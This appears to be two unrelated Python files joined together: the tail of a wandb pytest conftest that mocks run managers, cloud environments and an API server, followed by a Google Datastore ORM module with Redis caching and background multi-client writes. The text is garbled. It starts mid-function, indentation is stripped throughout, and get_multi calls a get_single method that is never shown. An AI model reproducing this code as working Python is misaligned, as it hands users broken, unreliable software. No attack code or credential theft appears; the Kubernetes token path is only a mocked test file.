mock = mocker.patch('wandb.run_manager.RunManager')
def fake_init(run, port=None, output=None, cloud=True):
print("Initialized fake run manager")
rm = fake_run_manager(mocker, run, cloud=cloud, rm_class=orig_rm)
rm._block_file_observer()
run.run_manager = rm
return rm
mock.side_effect = fake_init
if request.node.get_closest_marker('args'):
kwargs = request.node.get_closest_marker('args').kwargs
# Unfortunate to enable the test to work
if kwargs.get("dir"):
del os.environ['WANDB_RUN_DIR']
if kwargs.get("tensorboard"):
# The test uses tensorboardX so we need to be sure it's imported
# we use get_module because tensorboardX isn't available in py2
wandb.util.get_module("tensorboardX")
if kwargs.get("error"):
err = kwargs["error"]
del kwargs['error']
if err == "io":
@classmethod
def error(cls):
raise IOError
monkeypatch.setattr(
'wandb.wandb_run.Run.from_environment_or_defaults', error)
elif err == "socket":
class Error(object):
@property
def port(self):
return 123
def listen(self, secs):
return False, None
monkeypatch.setattr("wandb.wandb_socket.Server", Error)
if kwargs.get('k8s') is not None:
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
crt_path = "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
orig_exist = os.path.exists
def exists(path):
return True if path in token_path else orig_exist(path)
def magic(path, *args, **kwargs):
if path == token_path:
return six.StringIO('token')
mocker.patch('wandb.util.open', magic, create=True)
mocker.patch('wandb.util.os.path.exists', exists)
os.environ["KUBERNETES_SERVICE_HOST"] = "k8s"
os.environ["KUBERNETES_PORT_443_TCP_PORT"] = "123"
os.environ["HOSTNAME"] = "test"
if kwargs["k8s"]:
mock_server.ctx["k8s"] = True
del kwargs["k8s"]
if kwargs.get('sagemaker'):
del kwargs['sagemaker']
config_path = "/opt/ml/input/config/hyperparameters.json"
resource_path = "/opt/ml/input/config/resourceconfig.json"
secrets_path = "secrets.env"
os.environ['TRAINING_JOB_NAME'] = 'sage'
os.environ['CURRENT_HOST'] = 'maker'
orig_exist = os.path.exists
def exists(path):
return True if path in (config_path, secrets_path, resource_path) else orig_exist(path)
mocker.patch('wandb.os.path.exists', exists)
def magic(path, *args, **kwargs):
if path == config_path:
return six.StringIO('{"fuckin": "A"}')
elif path == resource_path:
return six.StringIO('{"hosts":["a", "b"]}')
elif path == secrets_path:
return six.StringIO('WANDB_TEST_SECRET=TRUE')
else:
return six.StringIO()
mocker.patch('wandb.open', magic, create=True)
mocker.patch('wandb.util.open', magic, create=True)
elif kwargs.get("tf_config"):
os.environ['TF_CONFIG'] = json.dumps(kwargs['tf_config'])
del kwargs['tf_config']
elif kwargs.get("env"):
for k, v in six.iteritems(kwargs["env"]):
os.environ[k] = v
del kwargs["env"]
else:
kwargs = {}
if request.node.get_closest_marker('resume'):
# env was leaking when running the whole suite...
if os.getenv(env.RUN_ID):
del os.environ[env.RUN_ID]
os.mkdir(wandb.wandb_dir())
with open(os.path.join(wandb.wandb_dir(), wandb_run.RESUME_FNAME), "w") as f:
f.write(json.dumps({"run_id": "test"}))
try:
print("Initializing with", kwargs)
run = wandb.init(**kwargs)
if request.node.get_closest_marker('resume') or request.node.get_closest_marker('mocked_run_manager') or request.node.get_closest_marker('jupyter'):
# Reset history
run._history = None
rm = wandb.run_manager.RunManager(run)
rm.init_run(os.environ)
if request.node.get_closest_marker('mock_socket'):
run.socket = mocker.MagicMock()
assert run is wandb.run
assert run.config is wandb.config
except wandb.LaunchError as e:
print("!!! wandb LaunchError raised")
run = e
yield run
if hasattr(run, "run_manager"):
print("Shutting down run manager")
run.run_manager.test_shutdown()
finally:
# restore the original environment
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
wandb.get_ipython = lambda: None
assert vars(wandb) == orig_namespace
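# Illustrative only (a sketch, not collected as a test from conftest): a test module
# could consume the fixture above like this. Without extra markers, wandb.init() is
# called with no arguments and the mocked run manager is attached to the run.
def _example_wandb_init_run_usage(wandb_init_run):
    # The fixture yields either a Run or the wandb.LaunchError it raised.
    assert not isinstance(wandb_init_run, wandb.LaunchError)
    assert wandb_init_run is wandb.run
    assert wandb_init_run.config is wandb.config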
def fake_run_manager(mocker, run=None, cloud=True, rm_class=wandb.run_manager.RunManager):
# NOTE: This will create a run directory so make sure it's called in an isolated file system
# We have an optional rm_class object because we mock it above so we need it before it's mocked
api = InternalApi(load_settings=False)
api.set_setting('project', 'testing')
if wandb.run is None:
wandb.run = run or Run()
wandb.config = wandb.run.config
wandb.run._api = api
wandb.run._mkdir()
wandb.run.socket = wandb_socket.Server()
api.set_current_run_id(wandb.run.id)
mocker.patch('wandb.apis.internal.FileStreamApi')
api._file_stream_api = mocker.MagicMock()
run_manager = rm_class(wandb.run, cloud=cloud, port=wandb.run.socket.port)
class FakeProc(object):
def poll(self):
return None
def exit(self, code=0):
return None
run_manager.proc = FakeProc()
run_manager._meta = mocker.MagicMock()
run_manager._stdout_tee = mocker.MagicMock()
run_manager._stderr_tee = mocker.MagicMock()
run_manager._output_log = mocker.MagicMock()
run_manager._stdout_stream = mocker.MagicMock()
run_manager._stderr_stream = mocker.MagicMock()
run_manager.mirror_stdout_stderr = mocker.MagicMock()
run_manager.unmirror_stdout_stderr = mocker.MagicMock()
socket_thread = threading.Thread(
target=wandb.run.socket.listen)
socket_thread.start()
run_manager._socket.ready()
thread = threading.Thread(
target=run_manager._sync_etc)
thread.daemon = True
thread.start()
def test_shutdown():
if wandb.run and wandb.run.socket:
wandb.run.socket.done()
# TODO: is this needed?
socket_thread.join()
thread.join()
run_manager.test_shutdown = test_shutdown
run_manager._unblock_file_observer()
run_manager._file_pusher._push_function = mocker.MagicMock()
return run_manager
@pytest.fixture
def run_manager(mocker, mock_server):
"""This fixture emulates the run_manager headless mode in a single process
Just call run_manager.test_shutdown() to join the threads
"""
# Reset the tensorboard state
wandb.tensorboard.reset_state()
with CliRunner().isolated_filesystem():
run_manager = fake_run_manager(mocker)
yield run_manager
wandb.uninit()
@pytest.fixture
def loggedin():
orig_environ = dict(os.environ)
try:
with CliRunner().isolated_filesystem():
os.environ["WANDB_API_KEY"] = "X"*40
yield os.environ
finally:
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
@pytest.fixture
def dryrun():
orig_environ = dict(os.environ)
try:
with CliRunner().isolated_filesystem():
os.environ["WANDB_MODE"] = "dryrun"
yield os.environ
finally:
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
# "Error: 'Session' object has no attribute 'request'""
# @pytest.fixture(autouse=True)
# def no_requests(monkeypatch, mock_server):
# monkeypatch.setattr("requests.sessions.Session.request", mock_server.request)
@pytest.fixture
def request_mocker(request, query_viewer):
"""
:param request: pytest request object for cleaning up.
:return: Returns instance of requests mocker used to mock HTTP calls.
"""
m = requests_mock.Mocker()
m.start()
query_viewer(m)
request.addfinalizer(m.stop)
return m
@pytest.fixture(autouse=True)
def preserve_environ():
environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(environ)
@pytest.fixture(autouse=True)
def check_environ():
"""Warn about WANDB_ environment variables the user has set
Sometimes it's useful to set things like WANDB_DEBUG intentionally, or
set other things for hacky debugging, but we want to make sure the user
knows about it.
"""
# we ignore WANDB_DESCRIPTION because we set it intentionally in
# pytest_runtest_setup()
wandb_keys = [key for key in os.environ.keys() if key.startswith(
'WANDB_') and key not in ['WANDB_TEST', 'WANDB_DESCRIPTION']]
if wandb_keys:
wandb.termwarn('You have WANDB_ environment variable(s) set. These may interfere with tests:')
for key in wandb_keys:
wandb.termwarn(' {} = {}'.format(key, repr(os.environ[key])))
def default_ctx():
return {
"fail_count": 0,
"page_count": 0,
"page_times": 2,
"files": {},
}
@pytest.fixture
def mock_server(mocker):
ctx = default_ctx()
app = create_app(ctx)
mock = utils.RequestsMock(app, ctx)
mocker.patch("gql.transport.requests.requests", mock)
mocker.patch("wandb.apis.file_stream.requests", mock)
mocker.patch("wandb.apis.internal.requests", mock)
mocker.patch("wandb.apis.public.requests", mock)
mocker.patch("wandb.util.requests", mock)
mocker.patch("wandb.artifacts.requests", mock)
return mock
@pytest.fixture
def live_mock_server(request):
if request.node.get_closest_marker('port'):
port = request.node.get_closest_marker('port').args[0]
else:
port = 8765
app = create_app(default_ctx())
server = Process(target=app.run, kwargs={"port": port, "debug": True, "use_reloader": False})
server.start()
for i in range(5):
try:
time.sleep(1)
res = requests.get("http://localhost:%s/storage" % port, timeout=1)
if res.status_code == 200:
break
print("Attempting to connect but got: %s", res)
except requests.exceptions.RequestException:
print("timed out")
yield server
server.terminate()
server.join()
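# Illustrative only: a test can pin the live server to a different port with the
# ``port`` marker read by the fixture above, e.g.
#
#   @pytest.mark.port(8766)
#   def test_against_live_server(live_mock_server):
#       assert requests.get("http://localhost:8766/storage").status_code == 200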
|
model.py
|
from google.cloud import datastore
from google.cloud.datastore import Query, Client
from google.cloud.datastore.query import Iterator
from google.cloud.datastore import helpers
from google.cloud.datastore import Key
import datetime
from time import sleep
from typing import get_type_hints, List, Union
import copy
import abc
from redis import StrictRedis
import pickle
import asyncio
import logging
from functools import partial
from concurrent.futures import ThreadPoolExecutor, as_completed
from threading import Thread
_MAX_LOOPS = 128
def get_custom_key_from_key(key):
"""
    Convert a datastore.Key into a CustomKey so that .get() can be called on it,
    mirroring the ndb.Key().get() pattern. Some model properties are fetched as plain
    Key objects rather than CustomKey, so they must be converted with this function
    before .get() is available.
:param key: datastore.Key
:return: CustomKey
>>> from google.cloud.datastore import Key
>>> from datastore_orm import get_custom_key_from_key
>>> key = Key('Kind','id_or_name')
>>> key_custom = get_custom_key_from_key(key)
>>> base_model_obj = key_custom.get()
"""
key_custom = CustomIterator.key_from_protobuf(key.to_protobuf())
key_custom._type = SubclassMap.get()[key_custom.kind]
return key_custom
def _extended_lookup(datastore_api, project, key_pbs,
missing=None, deferred=None,
eventual=False, transaction_id=None):
"""Repeat lookup until all keys found (unless stop requested).
Helper function for :meth:`Client.get_multi`.
:type datastore_api:
:class:`google.cloud.datastore._http.HTTPDatastoreAPI`
or :class:`google.cloud.datastore_v1.gapic.DatastoreClient`
:param datastore_api: The datastore API object used to connect
to datastore.
:type project: str
:param project: The project to make the request for.
:type key_pbs: list of :class:`.entity_pb2.Key`
:param key_pbs: The keys to retrieve from the datastore.
:type missing: list
:param missing: (Optional) If a list is passed, the key-only entity
protobufs returned by the backend as "missing" will be
copied into it.
:type deferred: list
:param deferred: (Optional) If a list is passed, the key protobufs returned
by the backend as "deferred" will be copied into it.
:type eventual: bool
:param eventual: If False (the default), request ``STRONG`` read
consistency. If True, request ``EVENTUAL`` read
consistency.
:type transaction_id: str
:param transaction_id: If passed, make the request in the scope of
the given transaction. Incompatible with
``eventual==True``.
:rtype: list of :class:`.entity_pb2.Entity`
:returns: The requested entities.
:raises: :class:`ValueError` if missing / deferred are not null or
empty list.
"""
if missing is not None and missing != []:
raise ValueError('missing must be None or an empty list')
if deferred is not None and deferred != []:
raise ValueError('deferred must be None or an empty list')
results = []
loop_num = 0
read_options = helpers.get_read_options(eventual, transaction_id)
while loop_num < _MAX_LOOPS: # loop against possible deferred.
loop_num += 1
lookup_response = datastore_api.lookup(
project,
key_pbs,
read_options=read_options,
)
# Accumulate the new results.
results.extend(result.entity for result in lookup_response.found)
if missing is not None:
missing.extend(result.entity for result in lookup_response.missing)
if deferred is not None:
deferred.extend(lookup_response.deferred)
break
if len(lookup_response.deferred) == 0:
break
# We have deferred keys, and the user didn't ask to know about
# them, so retry (but only with the deferred ones).
key_pbs = lookup_response.deferred
return results
class UTC(datetime.tzinfo):
"""Basic UTC implementation.
Implementing a small surface area to avoid depending on ``pytz``.
"""
_dst = datetime.timedelta(0)
_tzname = 'UTC'
_utcoffset = _dst
def dst(self, dt): # pylint: disable=unused-argument
"""Daylight savings time offset."""
return self._dst
def fromutc(self, dt):
"""Convert a timestamp from (naive) UTC to this timezone."""
if dt.tzinfo is None:
return dt.replace(tzinfo=self)
return super(UTC, self).fromutc(dt)
def tzname(self, dt): # pylint: disable=unused-argument
"""Get the name of this timezone."""
return self._tzname
def utcoffset(self, dt): # pylint: disable=unused-argument
"""UTC offset of this timezone."""
return self._utcoffset
def __repr__(self):
return '<%s>' % (self._tzname,)
def __str__(self):
return self._tzname
def pb_timestamp_to_datetime(timestamp_pb):
"""Convert a Timestamp protobuf to a datetime object.
:type timestamp_pb: :class:`google.protobuf.timestamp_pb2.Timestamp`
:param timestamp_pb: A Google returned timestamp protobuf.
:rtype: :class:`datetime.datetime`
:returns: A UTC datetime object converted from a protobuf timestamp.
"""
return (
_EPOCH +
datetime.timedelta(
seconds=timestamp_pb.seconds,
microseconds=(timestamp_pb.nanos / 1000.0),
)
)
_EPOCH = datetime.datetime.utcfromtimestamp(0).replace(tzinfo=UTC())
class SubclassMap:
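    """Lazily builds and caches a mapping from kind name (e.g. "Person") to the
    corresponding BaseModel subclass, so entities read back from Datastore can be
    rehydrated into the right model class."""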
_subclass_map: dict
@staticmethod
def get():
try:
return SubclassMap._subclass_map
except AttributeError:
subclasses = BaseModel.__subclasses__()
SubclassMap._subclass_map = {subclass.__name__: subclass for subclass in subclasses}
return SubclassMap._subclass_map
class CustomIterator(Iterator):
"""CustomIterator overrides the default Iterator and defines a custom _item_to_object method
in order to return BaseModel subclass objects instead of the default datastore entity
"""
def __init__(
self,
model_type,
query,
client,
limit=None,
offset=None,
start_cursor=None,
end_cursor=None,
eventual=False,
):
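        # Deliberately skip datastore's Iterator.__init__ and call the base
        # page_iterator.Iterator directly; its attribute setup is replicated below.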
super(Iterator, self).__init__(
client=client,
item_to_value=self._item_to_object,
page_token=start_cursor,
max_results=limit,
)
self.model_type: BaseModel = model_type
self._query = query
self._offset = offset
self._end_cursor = end_cursor
self._eventual = eventual
# The attributes below will change over the life of the iterator.
self._more_results = True
self._skipped_results = 0
@staticmethod
def object_from_protobuf(pb, model_type=None):
"""Factory method for creating a python object based on a protobuf.
The protobuf should be one returned from the Cloud Datastore
Protobuf API.
:type pb: :class:`.entity_pb2.Entity`
:param pb: The Protobuf representing the entity.
:rtype: :class:`google.cloud.datastore.entity.Entity`
:returns: The entity derived from the protobuf.
"""
key = None
if pb.HasField("key"): # Message field (Key)
key = CustomIterator.key_from_protobuf(pb.key)
key._type = SubclassMap.get()[key.kind]
entity_props = {}
for prop_name, value_pb in helpers._property_tuples(pb):
value = CustomIterator._get_value_from_value_pb(value_pb)
entity_props[prop_name] = value
obj = model_type._dotted_dict_to_object(entity_props, key)
return obj
@staticmethod
def _get_value_from_value_pb(value_pb):
"""Given a protobuf for a Value, get the correct value.
The Cloud Datastore Protobuf API returns a Property Protobuf which
        has one value set and the rest blank. This function retrieves the one
        value provided.
Some work is done to coerce the return value into a more useful type
(particularly in the case of a timestamp value, or a key value).
:type value_pb: :class:`.entity_pb2.Value`
:param value_pb: The Value Protobuf.
:rtype: object
:returns: The value provided by the Protobuf.
:raises: :class:`ValueError <exceptions.ValueError>` if no value type
has been set.
"""
value_type = value_pb.WhichOneof('value_type')
if value_type == 'timestamp_value':
result = pb_timestamp_to_datetime(value_pb.timestamp_value)
elif value_type == 'key_value':
result = CustomIterator.key_from_protobuf(value_pb.key_value)
result._type = SubclassMap.get()[result.kind]
elif value_type == 'boolean_value':
result = value_pb.boolean_value
elif value_type == 'double_value':
result = value_pb.double_value
elif value_type == 'integer_value':
result = value_pb.integer_value
elif value_type == 'string_value':
result = value_pb.string_value
elif value_type == 'blob_value':
result = value_pb.blob_value
elif value_type == 'entity_value':
result = helpers.entity_from_protobuf(value_pb.entity_value)
elif value_type == 'array_value':
result = [CustomIterator._get_value_from_value_pb(value)
for value in value_pb.array_value.values]
elif value_type == 'geo_point_value':
result = helpers.GeoPoint(value_pb.geo_point_value.latitude,
value_pb.geo_point_value.longitude)
elif value_type == 'null_value':
result = None
else:
raise ValueError('Value protobuf did not have any value set')
return result
def _item_to_object(self, iterator, entity_pb):
"""Convert a raw protobuf entity to the native object.
:type iterator: :class:`~google.api_core.page_iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type entity_pb:
:class:`.entity_pb2.Entity`
:param entity_pb: An entity protobuf to convert to a native entity.
:rtype: :class:`~google.cloud.datastore.entity.Entity`
:returns: The next entity in the page.
"""
return CustomIterator.object_from_protobuf(entity_pb, model_type=self.model_type)
@staticmethod
def key_from_protobuf(pb):
"""Factory method for creating a key based on a protobuf.
The protobuf should be one returned from the Cloud Datastore
Protobuf API.
:type pb: :class:`.entity_pb2.Key`
:param pb: The Protobuf representing the key.
:rtype: :class:`google.cloud.datastore.key.Key`
:returns: a new `Key` instance
"""
path_args = []
for element in pb.path:
path_args.append(element.kind)
if element.id: # Simple field (int64)
path_args.append(element.id)
# This is safe: we expect proto objects returned will only have
# one of `name` or `id` set.
if element.name: # Simple field (string)
path_args.append(element.name)
return CustomKey(*path_args)
class CustomKey(Key):
_client: datastore.Client # client to read/query from (reads are from a single client)
_clients: List[datastore.Client] # list of all clients (writes occur to all clients)
_type: object
_cache: StrictRedis
def __init__(self, *path_args, **kwargs):
if not getattr(self, '_client', None):
raise ValueError("Datastore _client is not set. Have you called datastore_orm.initialize()?")
if not kwargs.get('namespace'):
kwargs['namespace'] = self._client.namespace
if not kwargs.get('project'):
kwargs['project'] = self._client.project
super(CustomKey, self).__init__(*path_args, **kwargs)
self._type = SubclassMap.get()[self.kind]
@classmethod
def __initialize_class__(cls, clients=None, cache=None):
cls._clients = clients
cls._client = clients[0]
cls._cache = cache
# use_cache should be passed as False if another process is writing to the same entity in Datastore
def get(self, use_cache=True, expiry=86400):
cache_key = 'datastore_orm.{}.{}'.format(self.kind, self.id_or_name)
try:
if self._cache and use_cache:
obj = self._cache.get(cache_key)
if obj:
obj = pickle.loads(obj)
return obj
except:
pass
# Get object from datastore
obj = self._client.get(self, model_type=self._type)
try:
if self._cache:
self._cache.set(cache_key, pickle.dumps(obj), expiry)
except:
pass
return obj
def _get_updated_key(self, old_key, client):
if old_key.id_or_name:
key = CustomKey(old_key.kind, old_key.id_or_name, namespace=client.namespace, project=client.project)
else:
key = CustomKey(old_key.kind, namespace=client.namespace, project=client.project)
return key
def background_delete(self, key, clients):
for client in clients:
new_key = self._get_updated_key(key, client)
self.retry_background_delete(new_key, client, attempt=1)
def retry_background_delete(self, key, client, attempt):
# Sleeping before retrying. sleep time increases for each of the 3 retries.
sleep(0.5 * attempt)
if attempt < 4:
try:
client.delete(key)
except:
logging.warning(F"Failed to delete from datastore in background in attempt {attempt}, retrying.")
self.retry_background_delete(key, client, attempt + 1)
else:
return
def delete(self):
"""Delete object from datastore.
"""
if self._cache:
cache_key = 'datastore_orm.{}.{}'.format(self.kind, self.id_or_name)
self._cache.delete(cache_key)
if len(self._clients) > 1:
Thread(target=self.background_delete, args=(self, self._clients[1:])).start()
self._clients[0].delete(self)
def get_multi(self, keys):
objects = self._client.get_multi(keys, model_type=self._type)
return objects
class CustomQuery(Query):
"""CustomQuery class overrides the google.cloud.datastore.Query class in order to use a custom
iterator class in the fetch method.
"""
model_type: object
def __init__(self, model_type, **kwargs):
super(CustomQuery, self).__init__(**kwargs)
self.model_type = model_type
def fetch(
self,
limit=None,
offset=0,
start_cursor=None,
end_cursor=None,
client=None,
eventual=False,
):
"""Execute the Query; return an iterator for the matching entities.
For example::
>>> from google.cloud import datastore
>>> _client = datastore.Client()
>>> query = _client.query(kind='Person')
>>> query.add_filter('name', '=', 'Sally')
>>> list(query.fetch())
[<Entity object>, <Entity object>, ...]
>>> list(query.fetch(1))
[<Entity object>]
:type limit: int
:param limit: (Optional) limit passed through to the iterator.
:type offset: int
:param offset: (Optional) offset passed through to the iterator.
:type start_cursor: bytes
:param start_cursor: (Optional) cursor passed through to the iterator.
:type end_cursor: bytes
:param end_cursor: (Optional) cursor passed through to the iterator.
:type client: :class:`google.cloud.datastore.client.Client`
:param client: (Optional) _client used to connect to datastore.
If not supplied, uses the query's value.
:type eventual: bool
:param eventual: (Optional) Defaults to strongly consistent (False).
Setting True will use eventual consistency,
but cannot be used inside a transaction or
will raise ValueError.
:rtype: :class:`Iterator`
:returns: The iterator for the query.
"""
if client is None:
client = self._client
return CustomIterator(
self.model_type,
self,
client,
limit=limit,
offset=offset,
start_cursor=start_cursor,
end_cursor=end_cursor,
eventual=eventual
)
class BaseModel(metaclass=abc.ABCMeta):
"""Typically, users will interact with this library by creating sub-classes of BaseModel.
    BaseModel implements various helper methods (such as put, delete, query and to_dict) to allow the user to
interact with datastore directly from the subclass object.
"""
_client: datastore.Client
_clients: List[datastore.Client]
_exclude_from_indexes_: tuple
_cache: StrictRedis
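    # NOTE: __init__ is deliberately a classmethod. initialize() calls
    # BaseModel(clients, cache) once so that the shared clients/cache are bound to the
    # class itself and inherited by every model subclass.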
@classmethod
def __init__(cls, clients=None, cache=None):
cls._exclude_from_indexes_ = tuple()
cls._clients = clients
cls._client = clients[0]
cls._cache = cache
def dottify(self, base_name):
"""Convert a standard BaseModel object with nested objects into dot notation to maintain
compatibility with ndb created objects
        Example (this is how _to_entity flattens a nested model attribute) -
        >>> class A(BaseModel):
        >>>     x = 1
        >>> class B(BaseModel):
        >>>     z = 2
        >>>     y = A()
        >>> b = B()
        >>> b.y.dottify('y')
        {'y.x': 1}
"""
obj_dict = vars(self)
dotted_dict = {}
for k, v in obj_dict.items():
if v is not None:
dotted_dict[base_name + '.' + k] = v
return dotted_dict
@classmethod
def _dotted_dict_to_object(cls, dict_: dict, key: Key = None):
"""Convert a dictionary that was created with dottify() back into a standard BaseModel object
>>> dict_ = {
>>> "a": 1,
>>> "b.x": 2,
>>> "b.y": 3,
>>> "c.p": [4, 5]
>>> "c.q": [6, 7]
>>> }
>>> cls._dotted_dict_to_object(dict_)
Model(a=1, b=B(x=2, y=3), c=[C(p=4, q=6), C(p=5, q=7)])
"""
dotted_pairs = {}
for k, val in dict_.copy().items():
if '.' in k:
dotted_pairs[k] = val
del dict_[k]
class_dict = {}
for k, val in dotted_pairs.items():
class_, prop_key = k.split('.', 1)
if isinstance(val, list):
class_dict[class_] = class_dict.get(class_) or list()
for i, each_val in enumerate(val):
if len(class_dict[class_]) < i + 1:
class_dict[class_].append(dict())
class_dict[class_][i][prop_key] = each_val
else:
class_dict[class_] = class_dict.get(class_) or dict()
class_dict[class_][prop_key] = val
type_hints = get_type_hints(cls)
for class_, nested_prop in class_dict.items():
if isinstance(nested_prop, list):
nested_prop_list = []
for each_nested_prop in nested_prop:
nested_prop_list.append(type_hints[class_].__args__[0](**each_nested_prop))
dict_[class_] = nested_prop_list
else:
dict_[class_] = type_hints[class_](**nested_prop)
filtered_dict = {k: v for k, v in dict_.items() if k in type_hints}
obj = cls(**filtered_dict)
if key:
obj.key = key
return obj
@classmethod
def from_entity(cls, entity):
return cls._dotted_dict_to_object(dict(entity.items()), entity.key)
def _to_entity(self):
"""Converts a BaseModel subclass object into datastore entity. This method is called just before
datastore's _client.put is called.
"""
obj_dict = copy.deepcopy(vars(self))
exclude_from_indexes = ()
try:
exclude_from_indexes = self._exclude_from_indexes_
except AttributeError:
pass
try:
key = self.key
except AttributeError:
key = CustomKey(self.__class__.__name__)
entity = datastore.Entity(key=key, exclude_from_indexes=exclude_from_indexes)
for dict_key, dict_val in obj_dict.copy().items():
if dict_val is not None:
if isinstance(dict_val, BaseModel):
# If the value is an instance of BaseModel, convert the instance
# into a "dotted" dictionary compatible with NDB entities.
del obj_dict[dict_key]
obj_dict.update(dict_val.dottify(dict_key))
if isinstance(dict_val, list) and len(dict_val) > 0 and isinstance(dict_val[0], BaseModel):
# if the value is a list of BaseModel objects
dotted_dict_list = []
dotted_dict = dict()
for i, val in enumerate(dict_val):
dotted_dict_list.append(val.dottify(dict_key))
for dict_ in dotted_dict_list:
for k, v in dict_.items():
temp_val = dotted_dict.get(k) or []
temp_val.append(v)
dotted_dict[k] = temp_val
del obj_dict[dict_key]
obj_dict.update(dotted_dict)
else:
                # if the value is None, i.e. the attribute has not been set on the object,
                # drop it from the entity altogether
del obj_dict[dict_key]
entity.update(obj_dict)
return entity
def put(self, expiry=86400):
"""
Put the object into datastore.
"""
# TODO (Chaitanya): Directly convert object to protobuf and call PUT instead of converting to entity first.
entity = self._to_entity()
try:
if self._cache:
cache_key = 'datastore_orm.{}.{}'.format(self.__class__.__name__, entity.key.id_or_name)
self._cache.set(cache_key, pickle.dumps(self), expiry)
except:
pass
self.key = entity.key
if 'key' in entity:
del entity['key']
self._clients[0].put(entity)
# self.background_put(entity, self._clients[1:])
if len(self._clients) > 1:
Thread(target=self.background_put, args=(entity, self._clients[1:])).start()
entity.key._type = self.__class__
self.key = entity.key
return self.key
def background_put(self, entity, clients):
for client in clients:
new_entity = copy.deepcopy(entity)
for k, v in entity.items():
if isinstance(v, CustomKey):
new_entity[k] = self._get_updated_key(v, client)
elif isinstance(v, list) and len(v) > 0 and isinstance(v[0], CustomKey):
new_entity[k] = [self._get_updated_key(old_key, client) for old_key in v]
# TODO: Handle keys in dict and nested objects
new_entity.key = self._get_updated_key(new_entity.key, client)
self.retry_background_write(new_entity, client, attempt=1)
def retry_background_write(self, entity, client, attempt):
# Sleeping before retrying. sleep time increases for each of the 3 retries.
sleep(0.5 * attempt)
if attempt < 4:
try:
client.put(entity)
except:
logging.warning(F"Failed to write to datastore in background in attempt {attempt}, retrying.")
self.retry_background_write(entity, client, attempt + 1)
else:
return
def _get_updated_key(self, old_key, client):
if old_key.id_or_name:
key = CustomKey(old_key.kind, old_key.id_or_name, namespace=client.namespace, project=client.project)
else:
key = CustomKey(old_key.kind, namespace=client.namespace, project=client.project)
return key
def background_delete(self, key, clients):
for client in clients:
new_key = self._get_updated_key(key, client)
self.retry_background_delete(new_key, client, attempt=1)
def retry_background_delete(self, key, client, attempt):
# Sleeping before retrying. sleep time increases for each of the 3 retries.
sleep(0.5 * attempt)
if attempt < 4:
try:
client.delete(key)
except:
logging.warning(F"Failed to delete from datastore in background in attempt {attempt}, retrying.")
self.retry_background_delete(key, client, attempt + 1)
else:
return
def delete(self):
"""Delete object from datastore.
"""
# Delete from cache first
if self._cache:
cache_key = 'datastore_orm.{}.{}'.format(self.__class__.__name__, self.key.id_or_name)
self._cache.delete(cache_key)
# Pass the key for deleting from other clients in background
if len(self._clients) > 1:
Thread(target=self.background_delete, args=(self.key, self._clients[1:])).start()
# Delete the key from 1st client
self._clients[0].delete(self.key)
def to_dict(self, exclude: set = None):
        if isinstance(exclude, list):
            exclude = set(exclude)
exclude = (exclude or set()) | {'key'}
dict_ = {}
for k, v in vars(self).items():
if k not in exclude:
if isinstance(v, list) and len(v) > 0 and isinstance(v[0], BaseModel):
temp_val = []
for obj in v:
temp_val.append(obj.to_dict())
dict_[k] = temp_val
elif isinstance(v, BaseModel):
dict_[k] = v.to_dict()
else:
dict_[k] = v
return dict_
@classmethod
def query(cls, **kwargs) -> CustomQuery:
kwargs["project"] = cls._client.project
if "namespace" not in kwargs:
kwargs["namespace"] = cls._client.namespace
        return CustomQuery(cls, client=cls._client, kind=cls.__name__, **kwargs)
class CustomClient(Client):
_client: datastore.Client
_cache: StrictRedis
def __init__(self, client=None, cache=None):
self._client = client
self._cache = cache
if not getattr(self, '_client', None):
raise ValueError("Datastore _client is not set. Have you called datastore_orm.initialize()?")
super(CustomClient, self).__init__(project=self._client.project, namespace=self._client.namespace,
credentials=self._client._credentials)
def get(self, key, missing=None, deferred=None,
transaction=None, eventual=False, model_type=None):
"""Retrieve an entity from a single key (if it exists).
.. note::
This is just a thin wrapper over :meth:`get_multi`.
The backend API does not make a distinction between a single key or
multiple keys in a lookup request.
:type key: :class:`google.cloud.datastore.key.Key`
:param key: The key to be retrieved from the datastore.
:type missing: list
:param missing: (Optional) If a list is passed, the key-only entities
returned by the backend as "missing" will be copied
into it.
:type deferred: list
:param deferred: (Optional) If a list is passed, the keys returned
by the backend as "deferred" will be copied into it.
:type transaction:
:class:`~google.cloud.datastore.transaction.Transaction`
:param transaction: (Optional) Transaction to use for read consistency.
If not passed, uses current transaction, if set.
:type eventual: bool
:param eventual: (Optional) Defaults to strongly consistent (False).
Setting True will use eventual consistency, but cannot
be used inside a transaction or will raise ValueError.
:rtype: :class:`google.cloud.datastore.entity.Entity` or ``NoneType``
:returns: The requested entity if it exists.
:raises: :class:`ValueError` if eventual is True and in a transaction.
"""
start = datetime.datetime.now()
entities = self.get_multi(keys=[key],
missing=missing,
deferred=deferred,
transaction=transaction,
eventual=eventual, model_type=model_type)
if entities:
end = datetime.datetime.now()
            logging.debug('Time taken for get %s', end - start)
return entities[0]
def get_multi(self, keys, missing=None, deferred=None,
transaction=None, eventual=False, model_type=None, expiry=86400):
"""Retrieve entities, along with their attributes.
:type keys: list of :class:`google.cloud.datastore.key.Key`
:param keys: The keys to be retrieved from the datastore.
:type missing: list
:param missing: (Optional) If a list is passed, the key-only entities
returned by the backend as "missing" will be copied
into it. If the list is not empty, an error will occur.
:type deferred: list
:param deferred: (Optional) If a list is passed, the keys returned
by the backend as "deferred" will be copied into it.
If the list is not empty, an error will occur.
:type transaction:
:class:`~google.cloud.datastore.transaction.Transaction`
:param transaction: (Optional) Transaction to use for read consistency.
If not passed, uses current transaction, if set.
:type eventual: bool
:param eventual: (Optional) Defaults to strongly consistent (False).
Setting True will use eventual consistency, but cannot
be used inside a transaction or will raise ValueError.
:rtype: list of :class:`google.cloud.datastore.entity.Entity`
:returns: The requested entities.
:raises: :class:`ValueError` if one or more of ``keys`` has a project
which does not match our project.
:raises: :class:`ValueError` if eventual is True and in a transaction.
"""
if not keys:
return []
        get_multi_partial = partial(self.get_single, missing=missing, deferred=deferred, transaction=transaction,
                                    eventual=eventual, model_type=model_type, expiry=expiry)
with ThreadPoolExecutor(max_workers=min(len(keys), 10)) as executor:
basemodels = []
map_iterator = [[key] for key in keys]
results = executor.map(get_multi_partial, map_iterator)
for result in results:
basemodels.append(result[0] if result else None)
return basemodels
